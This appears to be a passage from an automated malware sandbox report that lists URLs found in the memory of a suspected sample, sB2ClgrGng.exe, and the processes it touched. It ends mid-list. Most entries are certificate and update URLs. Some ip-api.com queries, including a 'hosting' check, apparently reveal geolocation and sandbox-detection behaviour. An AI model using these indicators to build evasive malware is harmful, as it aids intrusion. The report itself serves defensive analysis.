Source: sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEDC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC05E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824376723.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2032780608.00000281ABADD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184795367.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164662200.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192974044.00000281AC99D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188821100.00000281AB619000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2185827911.00000281AC9BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2165183566.00000281AC9AD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184941571.00000281AC99D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894030317.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABAE4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2194187546.00000281ACEC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184941571.00000281AC9AD000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1919277034.00000281ABA74000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2191037746.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1825104762.00000281AC05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000D.00000002.2058156189.0000024647190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000020.00000002.3494718781.000002224EE00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _hashlib.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sB2ClgrGng.exe, 00000001.00000003.1769914240.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1778040329.00000281AB656000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1781566616.00000281AB6D3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1770763715.00000281AB96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000020.00000003.1849613191.000002224F018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000020.00000003.1849613191.000002224F04D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000020.00000003.1849613191.000002224F107000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: word.exe, 00000055.00000002.2087146224.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: sB2ClgrGng.exe, 00000001.00000003.1833375883.00000281AC05E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184795367.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164662200.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2166231720.00000281AC04B000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2191095661.00000281AC069000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1894131377.00000281AC066000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031560743.00000281AC03E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1920331178.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2187571679.00000281AC068000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1825104762.00000281AC05D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1893801082.00000281AC04F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://logo.ver6
Source: powershell.exe, 0000000D.00000002.2036783032.000002463EB07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1942613111.000001F2267FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F234F0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000002.2205989359.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37211C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759226545.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759647599.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1758733338.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, 